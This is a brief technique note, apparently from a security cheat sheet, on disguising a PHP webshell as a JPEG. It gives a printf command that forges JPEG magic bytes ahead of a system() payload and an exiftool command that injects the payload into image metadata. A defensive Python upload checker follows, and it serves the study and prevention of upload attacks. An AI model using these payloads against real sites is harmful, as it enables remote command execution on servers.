If you can upload a jpg file, it is possible to hide a webshell in it.
A JPEG file is identified by its first bytes, which have the value: ffd8ffe0
To generate a file that will be identified as having a valid JPEG header:
printf "\xff\xd8\xff\xe0<?php system('id'); ?>" > webshell.jpg
This file will be recognized as a JPG file:
$ file webshell.jpg
webshell.jpg: JPEG image data
An image file contains a lot of information: shooting date, location, camera type...
PHP code can be injected into this metadata, for example into the comment field:
exiftool -Comment="<?php system('id'); ?>" webshell.jpg
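
The same two files seen from the upload handler's side, as an added example that is not part of the original note: identification by leading bytes accepts the printf sample, so this Python function walks the JPEG segment structure and looks for PHP open tags in comment (COM) and APPn metadata. The function names, the tag list and the sample byte strings are assumptions constructed for illustration.

```python
import struct

PHP_TAGS = (b"<?php", b"<?=")                 # PHP open tags to look for
NO_LENGTH = {0x01, *range(0xD0, 0xD8)}       # TEM and RST0-7 carry no length field

def segment(marker: int, payload: bytes) -> bytes:
    # Build one JPEG segment: ff <marker> <2-byte big-endian length> <payload>
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload

def inspect_jpeg(data: bytes) -> list:
    """Return findings for an uploaded file; an empty list means nothing was flagged."""
    if data[:2] != b"\xff\xd8":
        return ["no SOI marker (ff d8) at offset 0"]
    findings, pos = [], 2
    while True:
        if pos + 2 > len(data) or data[pos] != 0xFF:
            findings.append(f"offset {pos}: expected a segment marker")
            break
        marker = data[pos + 1]
        if marker == 0xD9:                    # EOI: end of image
            break
        if marker in NO_LENGTH:
            pos += 2
            continue
        length = struct.unpack(">H", data[pos + 2:pos + 4].ljust(2, b"\0"))[0]
        end = pos + 2 + length
        if length < 2 or end > len(data):
            findings.append(f"ff{marker:02x} at offset {pos}: invalid segment length {length}")
            break
        payload = data[pos + 4:end].lower()
        if (marker == 0xFE or 0xE0 <= marker <= 0xEF) and any(t in payload for t in PHP_TAGS):
            findings.append(f"PHP open tag in metadata segment ff{marker:02x} at offset {pos}")
        if marker == 0xDA:                    # SOS: compressed data follows, stop walking
            if not data.endswith(b"\xff\xd9"):
                findings.append("no EOI marker (ff d9) at end of file")
            break
        pos = end
    if not any("PHP" in f for f in findings) and any(t in data.lower() for t in PHP_TAGS):
        findings.append("PHP open tag found outside a parsed metadata segment")
    return findings

# Constructed samples (not real images): the bytes the printf command writes, and
# segment-valid skeletons whose COM segment does or does not carry a PHP tag.
MAGIC_ONLY = b"\xff\xd8\xff\xe0<?php system('id'); ?>"
JFIF = segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
COMMENTED = b"\xff\xd8" + JFIF + segment(0xFE, b"<?php system('id'); ?>") + b"\xff\xd9"
CLEAN = b"\xff\xd8" + JFIF + segment(0xFE, b"holiday photo") + b"\xff\xd9"
```

A scan like this is a tripwire only; re-encoding uploaded images and storing them where the web server will not execute them are the stronger controls.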